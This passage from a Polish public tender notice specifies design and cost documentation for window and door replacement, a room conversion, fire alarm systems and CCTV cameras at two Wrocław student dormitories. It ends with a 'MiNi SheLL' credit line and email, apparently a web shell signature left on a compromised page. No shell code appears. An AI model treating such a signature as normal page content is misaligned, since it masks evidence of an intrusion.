4.Jeśli z obliczeń wyniknie konieczność wymiany jakiegoś fragmentu instalacji przewidzieć to w dokumentacji. 
5.Wymienić pompy obiegowe w węzłach cieplnych na elektroniczne i uzgodnić wymianę z FORTUM
6.W przedmiarze i kosztorysie oprócz demontaży i robót instalacyjno-montażowych przewidzieć m.in.: załadunek, transport i rozładunek złomu pochodzącego z demontażu. 
Technologia wykonywania robót powinna uwzględniać, że remont odbywać się będzie w czynnym obiekcie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 - Wykonanie dokumentacji projektowo - kosztorysowej remontu polegającego na wymianie stolarki okiennej na poziomie piwnic i przyziemia w domach studenckich: Ołówek przy pl. Grunwaldzkim 30 oraz Kredka przy ul. Grunwaldzkiej 69 oraz wymianie stolarki okiennej i drzwiowej wraz z przebudową w jednym pomieszczeniu w łączniku pomiędzy ww domami..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Uściślić inwentaryzację budowlaną obiektów w niezbędnym do projektowania zakresie.
2.W domu studenckim Ołówek:
 -wymienić stolarkę okienną (17 okien) wraz z okratowaniem lub innym zabezpieczeniem, nowymi podokiennikami oraz obróbkami wewnętrznymi i zewnętrznymi na poziomie piwnicy 
- uwzględnić demontaż i powtórny montaż instalacji wentylacji
- wymienić stolarkę okienną w świetliku na klatce schodowej (6 okien)
- w wymienionych już oknach na poziomie piwnicy zdemontować stare kraty i  zastosować jednolite do zaprojektowanych.
3.W łączniku: 
- wymienić stolarkę okienną (33 okna w większości dwudziałowe) wraz z obróbkami wewnętrznymi i zewnętrznymi oraz przewidzieć montaż nowych podokienników i kamiennych parapetów; przewidzieć otwieranie górnej części okien
- zabezpieczyć okna folią antywłamaniową
- w kosztorysie uwzględnić uzupełnienie glazury zniszczonej w trakcie robót
- wymienić stolarkę drzwiową (14 par drzwi wewnętrznych, w tym dwie pary będą otwierane w drugą stronę) wraz z obróbkami 
- wymienić 2 pary drzwi zewnętrznych od strony magazynowej (1 drzwi dwuskrzydłowe) na metalowe z dwoma atestowanymi zamkami
- przewidzieć demontaż kraty za drzwiami dwuskrzydłowymi
- uwzględnić demontaż i powtórny montaż wentylacji
- zaprojektować demontaż istniejących i montaż nowych nawiewników podokiennych z regulacją.
4.W domu studenckim Kredka:
- wymienić stolarkę okienną (21 okien) wraz z okratowaniem lub innym zabezpieczeniem, nowymi podokiennikami oraz obróbkami wewnętrznymi i zewnętrznymi na poziomie piwnicy oraz przyziemia (pomieszczenia magazynowe)
- uwzględnić demontaż i powtórny montaż instalacji wentylacji
- w wymienionych już oknach na poziomie piwnicy i przyziemia zdemontować stare kraty i zastosować jednolite do zaprojektowanych.
5.W celu przebudowy pomieszczenia w łączniku należy:
- zlikwidować przedsionek przez wyburzenie ścianki działowej między obecnym przedsionkiem a w/w pomieszczeniem. Jest to przebudowa wymagająca Decyzji o pozwoleniu na budowę 
- przewidzieć montaż klimatyzatora i przewidzieć kurtynę  powietrzną przy wejściu oraz demontaż sufitu podwieszanego w korytarzu w celu podwyższenia jego wysokości..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 4.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Zadanie nr 4 - Wykonanie  dokumentacji projektowo-kosztorysowej montażu systemu SAP w łączniku między domami studenckimi: Ołówek i Kredka przy ul. Bujwida 25 oraz montażu dodatkowych kamer telewizji dozorowej CCTV na zewnątrz domu studenckiego Kredka przy ul. Grunwaldzkiej 69 i na zewnątrz ww łącznika..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zinwentaryzować system SAP i telewizji dozorowej w niezbędnym do projektowania zakresie
2.Zaprojektować sygnalizację alarmu pożaru w pomieszczeniach usytuowanych w łączniku między domami studenckimi zgodnie z obowiązującymi przepisami ppoż. i uzgodnić z rzeczoznawcą ds.ppoż.
3.Zaprojektować dodatkowe kamery ok. 10 szt. przed wejściem do domu studenckiego Kredka, schodami do przychodni i na placu manewrowym na zapleczu budynku oraz zaprojektować system telewizji dozorowej obejmującej teren przed łącznikiem
Dokumentację należy wykonać osobno na system SAP i osobno na system telewizji dozorowej oraz osobno dla domu studenckiego i osobno dla łącznika.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.20.00.00-0.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 3.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com